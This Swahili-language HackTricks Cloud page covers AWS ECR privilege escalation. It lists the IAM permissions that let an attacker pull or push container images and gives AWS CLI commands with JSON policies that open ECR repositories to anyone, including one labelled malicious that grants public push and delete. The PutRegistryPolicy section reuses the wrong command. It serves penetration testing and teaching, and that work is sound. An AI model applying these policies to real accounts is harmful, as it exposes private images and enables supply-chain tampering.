Swahili - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - ECR Privesc

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

ECR

ecr:GetAuthorizationToken,ecr:BatchGetImage

Mshambuliaji mwenye ecr:GetAuthorizationToken na ecr:BatchGetImage anaweza kuingia kwenye ECR na kupakua picha.

Kwa habari zaidi kuhusu jinsi ya kupakua picha:

pageAWS - ECR Post Exploitation

Matokeo Yanayowezekana: Ukarabati usio wa moja kwa moja kwa kuteka taarifa nyeti katika trafiki.

ecr:GetAuthorizationToken, ecr:BatchCheckLayerAvailability, ecr:CompleteLayerUpload, ecr:InitiateLayerUpload, ecr:PutImage, ecr:UploadLayerPart

Mshambuliaji mwenye ruhusa zote hizo anaweza kuingia kwenye ECR na kupakia picha. Hii inaweza kuwa na manufaa kwa kukuza mamlaka kwa mazingira mengine ambapo picha hizo zinatumika.

Ili kujifunza jinsi ya kupakia picha mpya/kusasisha moja, angalia:

pageAWS - EKS Enum

ecr-public:GetAuthorizationToken, ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload, ecr-public:InitiateLayerUpload, ecr-public:PutImage, ecr-public:UploadLayerPart

Kama sehemu iliyopita, lakini kwa maktaba za umma.

ecr:SetRepositoryPolicy

Mshambuliaji mwenye ruhusa hii anaweza kubadilisha sera ya maktaba ili kujipatia (au hata kila mtu) upatikanaji wa kusoma/kuandika. Kwa mfano, kwenye mfano huu upatikanaji wa kusoma unatolewa kwa kila mtu.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

Yaliyomo ya my-policy.json:

{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

ecr-public:SetRepositoryPolicy

Kama ilivyokuwa kwenye sehemu iliyopita, lakini kwa maktaba za umma. Mshambuliaji anaweza kurekebisha sera ya maktaba ya maktaba ya umma ya ECR ili kutoa ufikiaji usiohalali kwa umma au kuinua madaraka yao.

bashCopy code# Create a JSON file with the malicious public repository policy
echo '{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "MaliciousPublicRepoPolicy",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr-public:GetDownloadUrlForLayer",
"ecr-public:BatchGetImage",
"ecr-public:BatchCheckLayerAvailability",
"ecr-public:PutImage",
"ecr-public:InitiateLayerUpload",
"ecr-public:UploadLayerPart",
"ecr-public:CompleteLayerUpload",
"ecr-public:DeleteRepositoryPolicy"
]
}
]
}' > malicious_public_repo_policy.json

# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json

Madhara Yanayoweza Kutokea: Upatikanaji usiohalali wa umma kwenye hifadhi ya ECR ya Umma, kuruhusu mtumiaji yeyote kusukuma, kuvuta, au kufuta picha.

ecr:PutRegistryPolicy

Mshambuliaji mwenye idhini hii anaweza kubadilisha sera ya usajili ili kujipatia yeye mwenyewe, akaunti yake (au hata kila mtu) upatikanaji wa kusoma/kuandika.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json
Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya HackTricks AWS)!

Njia nyingine za kusaidia HackTricks:

PreviousAWS - EC2 PrivescNextAWS - ECS Privesc

Last updated